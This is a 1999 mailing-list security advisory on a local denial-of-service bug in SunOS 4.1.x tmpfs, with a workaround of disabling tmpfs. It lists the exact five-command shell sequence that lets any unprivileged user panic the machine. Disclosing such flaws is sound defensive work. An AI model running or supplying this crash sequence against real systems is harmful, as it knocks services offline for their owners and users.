Date: Fri, 3 Sep 1999 11:06:45 -0700
From: Timothy Demarest <[email protected]>
To: [email protected]
Subject: SunOS 4.1.3 and 4.1.4 tmpfs DoS

While searching SunSolve for a completely unrelated issue, I came across
two bug reports (1115820, 1111248) that describe a way for any user to
panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
bugs have been reported to Sun, no patch is available. There is a simple
workaround, if you don't require tmpfs.
I have never seen this reported, so it might be good to share this with a
wider audience. I don't want my users using this as a DoS against our older
servers.
Requirements:
- The system must have /tmp mounted on swap (tmpfs)
- /tmp must be writable by the UID that will crash the machine. Since tmp
frequently has full permissions (drwxrwxrwt), this is fairly common.
How to panic the system:
    cd /tmp
    mkdir xx
    cd xx
    rmdir ../xx
    touch yy
    cd /
The system will then panic with "assertion failed: tp->tn_dir == NULL,
file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).
The workaround:
As specified in the bug reports, "do not use tmpfs."
I tested this only on SunOS 4.1.4 systems, but the bug reports list other
SunOS 4.1.x versions as well.
Tim
--
Timothy Demarest ArrayComm, Inc.
[email protected] 3141 Zanker Road
http://www.arraycomm.com San Jose, CA 95134